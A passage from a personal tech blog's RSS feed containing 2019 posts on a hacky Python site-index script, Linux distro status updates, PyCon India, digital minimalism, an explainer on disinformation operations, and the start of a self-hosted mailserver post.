    <span class="k">return</span> <span class="n">files</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>

<span class="c1"># adding an entry to the markdown table</span>
<span class="k">def</span> <span class="nf">update_index</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
    <span class="n">path</span> <span class="o">=</span> <span class="s2">&quot;../pages/_index.md&quot;</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s2">&quot;r&quot;</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="n">md</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">readlines</span><span class="p">()</span>
    <span class="n">ruler</span> <span class="o">=</span> <span class="n">md</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s2">&quot;| --- | --: |</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">)</span>
    <span class="n">md</span><span class="p">[</span><span class="n">ruler</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">s</span> <span class="o">+</span> <span class="s2">&quot;</span><span class="se">\n</span><span class="s2">&quot;</span>

    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s2">&quot;w&quot;</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="n">f</span><span class="o">.</span><span class="n">writelines</span><span class="p">(</span><span class="n">md</span><span class="p">)</span>

<span class="c1"># editing the md source in-place</span>
<span class="k">def</span> <span class="nf">update_blog</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
    <span class="n">path</span> <span class="o">=</span> <span class="s2">&quot;../pages/blog/_index.md&quot;</span>
    <span class="n">s</span> <span class="o">=</span> <span class="n">s</span> <span class="o">+</span> <span class="s2">&quot;</span><span class="se">\n</span><span class="s2">&quot;</span>
    <span class="k">for</span> <span class="n">l</span> <span class="ow">in</span> <span class="n">fileinput</span><span class="o">.</span><span class="n">FileInput</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">inplace</span><span class="o">=</span><span class="mi">1</span><span class="p">):</span>
        <span class="k">if</span> <span class="s2">&quot;--:&quot;</span> <span class="ow">in</span> <span class="n">l</span><span class="p">:</span>
            <span class="n">l</span> <span class="o">=</span> <span class="n">l</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l</span> <span class="o">+</span> <span class="n">s</span><span class="p">)</span>
        <span class="nb">print</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s2">&quot;&quot;</span><span class="p">),</span>


<span class="c1"># fetch title and date</span>
<span class="n">meta</span> <span class="o">=</span> <span class="n">markdown_path</span><span class="p">(</span><span class="n">getrecent</span><span class="p">(</span><span class="n">blog</span><span class="p">),</span> <span class="n">extras</span><span class="o">=</span><span class="p">[</span><span class="s2">&quot;metadata&quot;</span><span class="p">])</span><span class="o">.</span><span class="n">metadata</span>
<span class="n">fname</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">basename</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">splitext</span><span class="p">(</span><span class="n">getrecent</span><span class="p">(</span><span class="n">blog</span><span class="p">))[</span><span class="mi">0</span><span class="p">])</span>
<span class="n">url</span> <span class="o">=</span> <span class="s2">&quot;/blog/&quot;</span> <span class="o">+</span> <span class="n">fname</span>
<span class="n">line</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">&quot;| [</span><span class="si">{</span><span class="n">meta</span><span class="p">[</span><span class="s1">&#39;title&#39;</span><span class="p">]</span><span class="si">}</span><span class="s2">](</span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="s2">) | `</span><span class="si">{</span><span class="n">meta</span><span class="p">[</span><span class="s1">&#39;date&#39;</span><span class="p">]</span><span class="si">}</span><span class="s2">` |&quot;</span>

<span class="n">update_index</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="n">update_blog</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
</code></pre></div>

<p>I&#8217;m going to skip explaining this one out, but in essence, it&#8217;s <strong>one
massive hack</strong>. And in the end, that&#8217;s my point exactly. It&#8217;s very
hacky, but the sheer amount I learnt by writing this ~50
line script can&#8217;t be taught anywhere.</p>

<p>This was partially how
<a href="https://github.com/icyphox/vite">vite</a> was born. It was originally
intended to be a script to build my site, but grew into a full-blown
Python package. I could&#8217;ve just 
used an off-the-shelf static site generator
given that there are <a href="https://staticgen.com">so many</a> of them, but
I chose to write one myself.</p>

<p>And that just about sums up what I wanted to say. The best and most fun
way to learn to code---write hacky scripts. You heard it here.</p>
]]></description><link>https://icyphox.sh/blog/hacky-scripts</link><pubDate>Thu, 24 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/hacky-scripts</guid></item><item><title>Status update</title><description><![CDATA[<p>I&#8217;ve decided to drop the &#8220;Weekly&#8221; part of the status update posts, since
they were never weekly and---let&#8217;s be honest---they aren&#8217;t going to be.
These posts are, henceforth, just &#8220;Status updates&#8221;. The date range can
be inferred from the post date.</p>

<p>That said, here&#8217;s what I&#8217;ve been up to!</p>

<h2 id="void-linux">Void Linux</h2>

<p>Yes, I decided to ditch Alpine in favor of Void. Alpine was great,
really. The very comfy <code>apk</code>, ultra mnml system&#8230; but having to
maintain a chroot for my glibc needs was getting way too painful. And
the package updates are so slow! Heck, they&#8217;re still on kernel 4.xx on
their supposed &#8220;bleeding&#8221; <code>edge</code> repo.</p>

<p>So yes, Void Linux it is. Still a very clean system. I&#8217;m loving it.
I also undervolted my system using <a href="https://github.com/georgewhewell/undervolt"><code>undervolt</code></a>
(-95 mV). Can&#8217;t say for sure if there&#8217;s a noticeable difference in
battery life though. I&#8217;ll see if I can run some tests.</p>

<p>This <em>should</em> be the end of my distro hopping. Hopefully.</p>

<h2 id="pycon">PyCon</h2>

<p>Yeah yeah, enough already. Read <a href="/blog/pycon-wrap-up">my previous post</a>.</p>

<h2 id="this-website">This website</h2>

<p>I&#8217;ve moved out of GitHub Pages over to Netlify. This isn&#8217;t my first time
using Netlify, though. I used to host my old blog which ran Hugo, there.
I was tired of doing this terrible hack to maintain a single repo for
both my source (<code>master</code>) and deploy (<code>gh-pages</code>). In essence, here&#8217;s
what I did:</p>

<div class="codehilite"><pre><span></span><code><span class="ch">#!/usr/bin/env bash</span>

git push origin master
<span class="c1"># push contents of `build/` to the `gh-pages` branch</span>
git subtree push --prefix build origin gh-pages
</code></pre></div>

<p>I can now simply push to <code>master</code>, and Netlify generates a build for me
by installing <a href="https://github.com/icyphox/vite">vite</a>, and running <code>vite
build</code>. Very pleasant.</p>

<h2 id="mnmlwms-status"><code>mnmlwm</code>&#8217;s status</h2>

<p><a href="https://github.com/minimalwm/minimal">mnmlwm</a>, for those unaware, is my pet project which aims to be a simple
window manager written in Nim. I&#8217;d taken a break from it for a while
because Xlib is such a pain to work with (or I&#8217;m just dense). Anyway,
I&#8217;m planning on getting back to it, with some fresh inspiration from
Dylan Araps&#8217; <a href="https://github.com/dylanaraps/sowm">sowm</a>.</p>

<h2 id="other">Other</h2>

<p>I&#8217;ve been reading a lot of manga lately. Finished <em>Kekkon Yubiwa
Monogatari</em> (till the latest chapter) and <em>Another</em>, and I&#8217;ve just
started <em>Kakegurui</em>. I&#8217;ll reserve my opinions for when I update the
<a href="/reading">reading log</a>.</p>

<p>That&#8217;s about it, and I&#8217;ll see you---definitely not next week.</p>
]]></description><link>https://icyphox.sh/blog/2019-10-17</link><pubDate>Wed, 16 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-10-17</guid></item><item><title>PyCon India 2019 wrap-up</title><description><![CDATA[<p>I&#8217;m writing this article as I sit in class, back on the grind. Last
weekend---Oct 12th and 13th---was PyCon India 2019, in Chennai, India.
It was my first PyCon, <em>and</em> my first ever talk at a major conference!
This is an account of the all the cool stuff I saw, people I met and the
talks I enjoyed.
Forgive the lack of pictures---I prefer living the moment through my 
eyes. </p>

<h2 id="talks">Talks</h2>

<p>So much ML! Not that it&#8217;s a bad thing, but definitely interesting to
note. From what I counted, there were about 17 talks tagged under &#8220;Data
Science, Machine Learning and AI&#8221;. I&#8217;d have liked to see more talks
discussing security and privacy, but hey, the organizers can only pick
from what&#8217;s submitted. ;)</p>

<p>With that point out of the way, here are some of the talks I really liked:</p>

<ul>
<li><strong>Python Packaging&#8211;where we are and where we&#8217;re headed</strong> by <a href="https://twitter.com/pradyunsg">Pradyun</a></li>
<li><strong>Micropython: Building a Physical Inventory Search Engine</strong> by <a href="https://twitter.com/stonecharioteer">Vinay</a></li>
<li><strong>Ragabot&#8211;Music Encoded</strong> by <a href="https://twitter.com/vikipedia">Vikrant</a></li>
<li><strong>Let&#8217;s Hunt a Memory Leak</strong> by <a href="https://twitter.com/sankeyplus">Sanket</a></li>
<li>oh and of course, <a href="https://twitter.com/dabeaz">David Beazley</a>&#8217;s closing
keynote</li>
</ul>

<h2 id="my-talk">My talk (!!!)</h2>

<p>My good buddy <a href="https://twitter.com/_vologue">Raghav</a> and I spoke about
our smart lock security research. Agreed, it might have been less
&#8220;hardware&#8221; and more of a bug on the server-side, but that&#8217;s the thing
about IoT right? It&#8217;s so multi-faceted, and is an amalgamation of so
many different hardware and software stacks. But, anyway&#8230;</p>

<p>I was reassured by folks after the talk that the silence during Q/A was 
the &#8220;good&#8221; kind of silence. Was it really? I&#8217;ll never know.</p>

<h2 id="some-nice-people-i-met">Some nice people I met</h2>

<ul>
<li><a href="https://twitter.com/abhirathb">Abhirath</a>---A 200 IQ lad. Talked to
me about everything from computational biology to the physical
implementation of quantum computers.</li>
<li><a href="https://twitter.com/meain_">Abin</a>---He recognized me from my
<a href="https://reddit.com/r/unixporn">r/unixporn</a> posts, which was pretty
awesome.</li>
<li><a href="https://twitter.com/h6165">Abhishek</a></li>
<li>Pradyun and Vikrant (linked earlier)</li>
</ul>

<p>And a lot of other people doing really great stuff, whose names I&#8217;m
forgetting.</p>

<h2 id="pictures">Pictures!</h2>

<p>It&#8217;s not much, and
I can&#8217;t be bothered to format them like a collage or whatever, so I&#8217;ll
just dump them here---as is.</p>

<p><img src="/static/img/silly_badge.jpg" alt="nice badge" />
<img src="/static/img/abhishek_anmol.jpg" alt="awkward smile!" />
<img src="/static/img/me_talking.jpg" alt="me talking" />
<img src="/static/img/s443_pycon.jpg" alt="s443 @ pycon" /></p>

<h2 id="cest-tout">C&#8217;est tout</h2>

<p>Overall, a great time and a weekend well spent. It was very different
from your typical security conference---a lot more <em>chill</em>, if you
will. The organizers did a fantastic job and the entire event was put
together really well.
I don&#8217;t have much else to say, but I know for sure that I&#8217;ll be
there next time.</p>

<p>That was PyCon India, 2019.</p>
]]></description><link>https://icyphox.sh/blog/pycon-wrap-up</link><pubDate>Tue, 15 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/pycon-wrap-up</guid></item><item><title>Thoughts on digital minimalism</title><description><![CDATA[<p>Ah yes, yet another article on the internet on this beaten to death
subject. But this is inherently different, since it&#8217;s <em>my</em> opinion on
the matter, and <em>my</em> technique(s) to achieve &#8220;digital minimalism&#8221;.</p>

<p>According to me, minimalism can be achieved on two primary fronts --
the phone &amp; the computer. Let&#8217;s start with the phone. The daily carry.
The device that&#8217;s on our person from when we get out of bed, till we get
back in bed.</p>

<h2 id="the-phone">The phone</h2>

<p>I&#8217;ve read about a lot of methods people employ to curb their phone
usage. Some have tried grouping &#8220;distracting&#8221; apps into a separate
folder, and this supposedly helps reduce their usage. Now, I fail to see
how this would work, but YMMV. Another technique I see often is using
a time governance app---like OnePlus&#8217; Zen Mode---to enforce how much
time you spend using specific apps, or the phone itself. I&#8217;ve tried this
for myself, but I constantly found myself counting down the minutes
after which the phone would become usable again. Not helpful.</p>

<p>My solution to this is a lot more brutal. I straight up uninstalled the
apps that I found myself using too often. There&#8217;s a simple principle
behind it---if the app has a desktop alternative, like Twitter,
Reddit, etc. use that instead. Here&#8217;s a list of apps that got nuked from
my phone:</p>

<ul>
<li>Twitter</li>
<li>Instagram (an exception, no desktop client)</li>
<li>Relay for Reddit</li>
<li>YouTube (disabled, ships with stock OOS)</li>
</ul>

<p>The only non-productive app that I&#8217;ve let remain is Clover, 
a 4chan client. I didn&#8217;t find myself using it as much earlier, but we&#8217;ll see how that 
holds up. I&#8217;ve also allowed my personal messaging apps to remain, since 
removing those would be inconveniencing others.</p>

<p>I must admit, I often find myself reaching for my phone out of habit
just to check Twitter, only to find that its gone. I also subconsciously
tap the place where its icon used to exist (now replaced with my mail
client) on my launcher. The only &#8220;fun&#8221; thing left on my phone to do is
read or listen to music. Which is okay, in my opinion.</p>

<h2 id="the-computer">The computer</h2>

<p>I didn&#8217;t do anything too nutty here, and most of the minimalism is
mostly aesthetic. I like UIs that get out of the way. </p>

<p>My setup right now is just a simple bar at the top showing the time,
date, current volume and battery %, along with my workspace indicators.
No fancy colors, no flashy buttons and sliders. And that&#8217;s it. I don&#8217;t
try to force myself to not use stuff---after all, I&#8217;ve reduced it
elsewhere. :)</p>

<p>Now the question arises: Is this just a phase, or will I stick to it?
What&#8217;s going to stop me from heading over to the Play Store and
installing those apps back? Well, I never said this was going to be
easy. There&#8217;s definitely some will power needed to pull this off.
I guess time will tell.</p>
]]></description><link>https://icyphox.sh/blog/digital-minimalism</link><pubDate>Sat, 05 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/digital-minimalism</guid></item><item><title>Weekly status update, 09/17–09/27</title><description><![CDATA[<p>It&#8217;s a lazy Friday afternoon here; yet another off day this week thanks to my
uni&#8217;s fest. My last &#8220;weekly&#8221; update was 10 days ago, and a lot has happened
since then. Let&#8217;s get right into it!</p>

<h2 id="my-switch-to-alpine">My switch to Alpine</h2>

<p>Previously, I ran Debian with Buster/Sid repos, and ever since this happened</p>

<div class="codehilite"><pre><span></span><code>$ dpkg --list <span class="p">|</span> wc -l
<span class="m">3817</span>

<span class="c1"># or something in that ballpark</span>
</code></pre></div>

<p>I&#8217;ve been wanting to reduce my system&#8217;s package count.</p>

<p>Thus, I began my search for a smaller, simpler and lighter distro with a fairly
sane package manager. I did come across Dylan Araps&#8217;
<a href="https://getkiss.org">KISS Linux</a> project, but it seemed a little too hands-on
for me (and still relatively new). I finally settled on
<a href="https://alpinelinux.org">Alpine Linux</a>. According to their website:</p>

<blockquote>
  <p>Alpine Linux is a security-oriented, lightweight Linux distribution based 
  on musl libc and busybox.</p>
</blockquote>

<p>The installation was a breeze, and I was quite surprised to see WiFi working
OOTB. In the past week of my using this distro, the only major hassle I faced
was getting my Minecraft launcher to run. The JRE isn&#8217;t fully ported to <code>musl</code>
yet.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup> The solution to that is fairly trivial and I plan to write about it
soon. (hint: it involves chroots)</p>

<p><img src="/static/img/rice-2019-09-27.png" alt="rice" /></p>

<h2 id="packaging-for-alpine">Packaging for Alpine</h2>

<p>On a related note, I&#8217;ve been busy packaging some of the stuff I use for Alpine
-- you can see my personal <a href="https://github.com/icyphox/aports">aports</a>
repository if you&#8217;re interested. I&#8217;m currently working on packaging Nim too, so
keep an eye out for that in the coming week.</p>

<h2 id="talk-selection-at-pycon-india">Talk selection at PyCon India!</h2>

<p>Yes! My buddy Raghav (<a href="https://twitter.com/_vologue">@_vologue</a>) and I are
going to be speaking at PyCon India about our recent smart lock security
research. The conference is happening in Chennai, much to our convenience.
If you&#8217;re attending too, hit me up on Twitter and we can hang!</p>

<h2 id="other">Other</h2>

<p>That essentially sums up the <em>technical</em> stuff that I did. My Russian is going
strong, my reading however, hasn&#8217;t. I have <em>yet</em> to finish those books! This
week, for sure.</p>

<p>Musically, I&#8217;ve been experimenting. I tried a bit of hip-hop and chilltrap, and
I think I like it? I still find myself coming back to metalcore/deathcore.
Here&#8217;s a list of artists I discovered (and liked) recently:</p>

<ul>
<li><a href="https://www.youtube.com/watch?v=r3uKGwcwGWA">Before I Turn</a></li>
<li>生 Conform 死 (couldn&#8217;t find any official YouTube video, check Spotify)</li>
<li><a href="https://www.youtube.com/watch?v=66eFK1ttdC4">Treehouse Burning</a></li>
<li><a href="https://www.youtube.com/watch?v=m-w3XM2PwOY">Lee McKinney</a></li>
<li><a href="https://www.youtube.com/watch?v=cUibXK7F3PM">Berried Alive</a> (rediscovered)</li>
</ul>

<p>That&#8217;s it for now, I&#8217;ll see you next week!</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-1">
<p>The <a href="https://aboullaite.me/protola-alpine-java/">Portola Project</a>&#160;<a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/2019-09-27</link><pubDate>Fri, 27 Sep 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-09-27</guid></item><item><title>Weekly status update, 09/08–09/17</title><description><![CDATA[<p>This is something new I&#8217;m trying out, in an effort to write more frequently
and to serve as a log of how I&#8217;m using my time. In theory, I will write this post
every week. I&#8217;ll need someone to hold me accountable if I don&#8217;t. I have yet to decide on
a format for this, but it will probably include a quick summary of the work I did,
things I read, IRL stuff, etc.</p>

<p>With the meta stuff out of the way, here&#8217;s what went down last week!</p>

<h2 id="my-discovery-of-the-xxiivv-webring">My discovery of the XXIIVV webring</h2>

<p>Did you notice the new fidget-spinner-like logo at the bottom? Click it! It&#8217;s a link to
the <a href="https://webring.xxiivv.com">XXIIVV webring</a>. I really like the idea of webrings.
It creates a small community of sites and enables sharing of traffic among these sites.
The XXIIVV webring consists mostly of artists, designers and developers and gosh, some
of those sites are beautiful. Mine pales in comparison.</p>

<p>The webring also has a <a href="https://github.com/buckket/twtxt">twtxt</a> echo chamber aptly
called <a href="https://webring.xxiivv.com/hallway.html">The Hallway</a>. twtxt is a fantastic project
and its complexity-to-usefulness ratio greatly impresses me. You can find my personal
twtxt feed at <code>/twtxt.txt</code> (root of this site).</p>

<p>Which brings me to the next thing I did this/last week.</p>

<h2 id="twsh-a-twtxt-client-written-in-bash"><code>twsh</code>: a twtxt client written in Bash</h2>

<p>I&#8217;m not a fan of the official Python client, because you know, Python is bloat.
As an advocate of <em>mnmlsm</em>, I can&#8217;t use it in good conscience. Thus, began my
authorship of a truly mnml client in pure Bash. You can find it <a href="https://github.com/icyphox/twsh">here</a>.
It&#8217;s not entirely useable as of yet, but it&#8217;s definitely getting there, with the help
of <a href="https://nerdypepper.me">@nerdypepper</a>.</p>

<h2 id="other">Other</h2>

<p>I have been listening to my usual podcasts: Crime Junkie, True Crime Garage,
Darknet Diaries &amp; Off the Pill. To add to this list, I&#8217;ve begun binging Vice&#8217;s CYBER.
It&#8217;s pretty good---each episode is only about 30 mins and it hits the sweet spot,
delvering both interesting security content and news.</p>

<p>My reading needs a ton of catching up. Hopefully I&#8217;ll get around to finishing up
&#8220;The Unending Game&#8221; this week. And then go back to &#8220;Terrorism and Counterintelligence&#8221;.</p>

<p>I&#8217;ve begun learning Russian! I&#8217;m really liking it so far, and it&#8217;s been surprisingly
easy to pick up. Learning the Cyrillic script will require some relearning, especially
with letters like в, н, р, с, etc. that look like English but sound entirely different.
I think I&#8217;m pretty serious about learning this language---I&#8217;ve added the Russian keyboard
to my Google Keyboard to aid in my familiarization of the alphabet. I&#8217;ve added the <code>RU</code>
layout to my keyboard map too:</p>

<pre><code>setxkbmap -option 'grp:alt_shift_toggle' -layout us,ru
</code></pre>

<p>With that ends my weekly update, and I&#8217;ll see you next week!</p>
]]></description><link>https://icyphox.sh/blog/2019-09-17</link><pubDate>Tue, 17 Sep 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-09-17</guid></item><item><title>Disinformation demystified</title><description><![CDATA[<p>As with the disambiguation of any word, let&#8217;s start with its etymology and definiton.
According to <a href="https://en.wikipedia.org/wiki/Disinformation">Wikipedia</a>,
<em>disinformation</em> has been borrowed from the Russian word --- <em>dezinformatisya</em> (дезинформа́ция),
derived from the title of a KGB black propaganda department.</p>

<blockquote>
  <p>Disinformation is false information spread deliberately to deceive.</p>
</blockquote>

<p>To fully understand disinformation, especially in the modern age, we need to understand the
key factors of any successful disinformation operation:</p>

<ul>
<li>creating disinformation (what)</li>
<li>the motivation behind the op, or its end goal (why)</li>
<li>the medium used to disperse the falsified information (how)</li>
<li>the actor (who)</li>
</ul>

<p>At the end, we&#8217;ll also look at how you can use disinformation techniques to maintain OPSEC.</p>

<p>In order to break monotony, I will also be using the terms &#8220;information operation&#8221;, or the shortened
forms---"info op&#8221; &amp; &#8220;disinfo&#8221;.</p>

<h2 id="creating-disinformation">Creating disinformation</h2>

<p>Crafting or creating disinformation is by no means a trivial task. Often, the quality
of any disinformation sample is a huge indicator of the level of sophistication of the
actor involved, i.e. is it a 12 year old troll or a nation state?</p>

<p>Well crafted disinformation always has one primary characteristic --- &#8220;plausibility&#8221;.
The disinfo must sound reasonable. It must induce the notion it&#8217;s <em>likely</em> true. 
To achieve this, the target --- be it an individual, a specific demographic or an entire
nation --- must be well researched. A deep understanding of the target&#8217;s culture, history,
geography and psychology is required. It also needs circumstantial and situational awareness,
of the target.</p>

<p>There are many forms of disinformation. A few common ones are staged videos / photographs, 
recontextualized videos / photographs, blog posts, news articles &amp; most recently --- deepfakes.</p>

<p>Here&#8217;s a tweet from <a href="https://twitter.com/thegrugq">the grugq</a>, showing a case of recontextualized
imagery:</p>

<blockquote class="twitter-tweet" data-dnt="true" data-theme="dark" data-link-color="#00ffff">
<p lang="en" dir="ltr">Disinformation.
<br><br>
The content of the photo is not fake. The reality of what it captured is fake. The context it’s placed in is fake. The picture itself is 100% authentic. Everything, except the photo itself, is fake.
<br><br>Recontextualisation as threat vector. 
<a href="https://t.co/Pko3f0xkXC">pic.twitter.com/Pko3f0xkXC</a>
</p>&mdash; thaddeus e. grugq (@thegrugq) 
<a href="https://twitter.com/thegrugq/status/1142759819020890113?ref_src=twsrc%5Etfw">June 23, 2019</a>
</blockquote>

<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> 

<h2 id="motivations-behind-an-information-operation">Motivations behind an information operation</h2>

<p>I like to broadly categorize any info op as either proactive or reactive. 
Proactively, disinformation is spread with the desire to influence the target
either before or during the occurence of an event. This is especially observed
during elections.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup>
In offensive information operations, the target&#8217;s psychological state can be affected by
spreading <strong>fear, uncertainty &amp; doubt</strong>, or FUD for short.</p>

<p>Reactive disinformation is when the actor, usually a nation state in this case,
screws up and wants to cover their tracks. A fitting example of this is the case
of Malaysian Airlines Flight 17 (MH17), which was shot down while flying over 
eastern Ukraine. This tragic incident has been attributed to Russian-backed 
separatists.<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup> 
Russian media is known to have desseminated a number of alternative &amp; some even
conspiratorial theories<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>, in response. The number grew as the JIT&#8217;s (Dutch-lead Joint
Investigation Team) investigations pointed towards the separatists. 
The idea was to <strong>muddle the information</strong> space with these theories, and as a result,
potentially correct information takes a credibility hit.</p>

<p>Another motive for an info op is to <strong>control the narrative</strong>. This is often seen in use
in totalitarian regimes; when the government decides what the media portrays to the
masses. The ongoing Hong Kong protests is a good example.<sup class="footnote-ref" id="fnref-4"><a href="#fn-4">4</a></sup> According to <a href="https://www.npr.org/2019/08/14/751039100/china-state-media-present-distorted-version-of-hong-kong-protests">NPR</a>:</p>

<blockquote>
  <p>Official state media pin the blame for protests on the &#8220;black hand&#8221; of foreign interference, 
  namely from the United States, and what they have called criminal Hong Kong thugs.
  A popular conspiracy theory posits the CIA incited and funded the Hong Kong protesters, 
  who are demanding an end to an extradition bill with China and the ability to elect their own leader.
  Fueling this theory, China Daily, a state newspaper geared toward a younger, more cosmopolitan audience, 
  this week linked to a video purportedly showing Hong Kong protesters using American-made grenade launchers to combat police.
  &#8230;</p>
</blockquote>

<h2 id="media-used-to-disperse-disinfo">Media used to disperse disinfo</h2>

<p>As seen in the above example of totalitarian governments, national TV and newspaper agencies
play a key role in influence ops en masse. It guarantees outreach due to the channel/paper&#8217;s
popularity.</p>

<p>Twitter is another, obvious example. Due to the ease of creating accounts and the ability to
generate activity programmatically via the API, Twitter bots are the go-to choice today for 
info ops. Essentially, an actor attempts to create &#8220;discussions&#8221; amongst &#8220;users&#8221; (read: bots),
to push their narrative(s). Twitter also provides analytics for every tweet, enabling actors to
get realtime insights into what sticks and what doesn&#8217;t.
The use of Twitter was seen during the previously discussed MH17 case, where Russia employed its troll
factory --- the <a href="https://en.wikipedia.org/wiki/Internet_Research_Agency">Internet Research Agency</a> (IRA)
to create discussions about alternative theories.</p>

<p>In India, disinformation is often spread via YouTube, WhatsApp and Facebook. Political parties
actively invest in creating group chats to spread political messages and memes. These parties
have volunteers whose sole job is to sit and forward messages.
Apart from political propaganda, WhatsApp finds itself as a medium of fake news. In most cases,
this is disinformation without a motive, or the motive is hard to determine simply because
the source is impossible to trace, lost in forwards.<sup class="footnote-ref" id="fnref-5"><a href="#fn-5">5</a></sup>
This is a difficult problem to combat, especially given the nature of the target audience.</p>

<h2 id="the-actors-behind-disinfo-campaigns">The actors behind disinfo campaigns</h2>

<p>I doubt this requires further elaboration, but in short:</p>

<ul>
<li>nation states and their intelligence agencies</li>
<li>governments, political parties</li>
<li>other non/quasi-governmental groups</li>
<li>trolls</li>
</ul>

<p>This essentially sums up the what, why, how and who of disinformation. </p>

<h2 id="personal-opsec">Personal OPSEC</h2>

<p>This is a fun one. Now, it&#8217;s common knowledge that
<strong>STFU is the best policy</strong>. But sometimes, this might not be possible, because
afterall inactivity leads to suspicion, and suspicion leads to scrutiny. Which might
lead to your OPSEC being compromised.
So if you really have to, you can feign activity using disinformation. For example,
pick a place, and throw in subtle details pertaining to the weather, local events
or regional politics of that place into your disinfo. Assuming this is Twitter, you can
tweet stuff like:</p>

<ul>
<li>&#8220;Ugh, when will this hot streak end?!&#8221;</li>
<li>&#8220;Traffic wonky because of the Mardi Gras parade.&#8221;</li>
<li>&#8220;Woah, XYZ place is nice! Especially the fountains by ABC street.&#8221;</li>
</ul>

<p>Of course, if you&#8217;re a nobody on Twitter (like me), this is a non-issue for you.</p>

<p>And please, don&#8217;t do this:</p>

<p><img src="/static/img/mcafeetweet.png" alt="mcafee opsecfail" /></p>

<h2 id="conclusion">Conclusion</h2>

<p>The ability to influence someone&#8217;s decisions/thought process in just one tweet is 
scary. There is no simple way to combat disinformation. Social media is hard to control.
Just like anything else in cyber, this too is an endless battle between social media corps
and motivated actors.</p>

<p>A huge shoutout to Bellingcat for their extensive research in this field, and for helping
folks see the truth in a post-truth world.</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-1">
<p><a href="https://www.vice.com/en_us/article/ev3zmk/an-expert-explains-the-many-ways-our-elections-can-be-hacked">This</a> episode of CYBER talks about election influence ops (features the grugq!).&#160;<a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>

<li id="fn-2">
<p>The <a href="https://www.bellingcat.com/category/resources/podcasts/">Bellingcat Podcast</a>&#8217;s season one covers the MH17 investigation in detail.&#160;<a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">&#8617;</a></p>
</li>

<li id="fn-3">
<p><a href="https://en.wikipedia.org/wiki/Malaysia_Airlines_Flight_17#Conspiracy_theories">Wikipedia section on MH17 conspiracy theories</a>&#160;<a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">&#8617;</a></p>
</li>

<li id="fn-4">
<p><a href="https://twitter.com/gdead/status/1171032265629032450">Chinese newspaper spreading disinfo</a>&#160;<a href="#fnref-4" class="footnoteBackLink" title="Jump back to footnote 4 in the text.">&#8617;</a></p>
</li>

<li id="fn-5">
<p>Use an adblocker before clicking <a href="https://www.news18.com/news/tech/fake-whatsapp-message-of-child-kidnaps-causing-mob-violence-in-madhya-pradesh-2252015.html">this</a>.&#160;<a href="#fnref-5" class="footnoteBackLink" title="Jump back to footnote 5 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/disinfo</link><pubDate>Tue, 10 Sep 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/disinfo</guid></item><item><title>Setting up my personal mailserver</title><description><![CDATA[<p>A mailserver was a long time coming. I&#8217;d made an attempt at setting one up
around ~4 years ago (ish), and IIRC, I quit when it came to DNS. And
I almost did this time too.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>

<p>For this attempt, I wanted a simpler approach. I recall how terribly
confusing Dovecot &amp; Postfix were to configure and hence I decided to look
for a containerized solution, that most importantly, runs on my cheap $5 
Digital Ocean VPS --- 1 vCPU and 1 GB memory. Of which only around 500 MB
is actually available. So yeah, <em>pretty</em> tight.</p>

<h2 id="whats-available">What&#8217;s available</h2>

<p>Turns out, there are quite a few of these OOTB, ready to deply solutions.
These are the ones I came across:</p>

<ul>
<li><p><a href="https://poste.io">poste.io</a>: Based on an &#8220;open core&#8221; model. The base install is open source 
and free (as in beer), but you&#8217;ll have to pay for the extra stuff.</p></li>
<li><p><a href="https://mailu.io">mailu.io</a>: Free software. Draws inspiration from poste.io, 
but ships with a web UI that I didn&#8217;t need. </p></li>
<li><p><a href="https://mailcow.email">mailcow.email</a>: These fancy domains are getting ridiculous. But more importantly
they need 2 GiB of RAM <em>plus</em> swap?! Nope.</p></li>
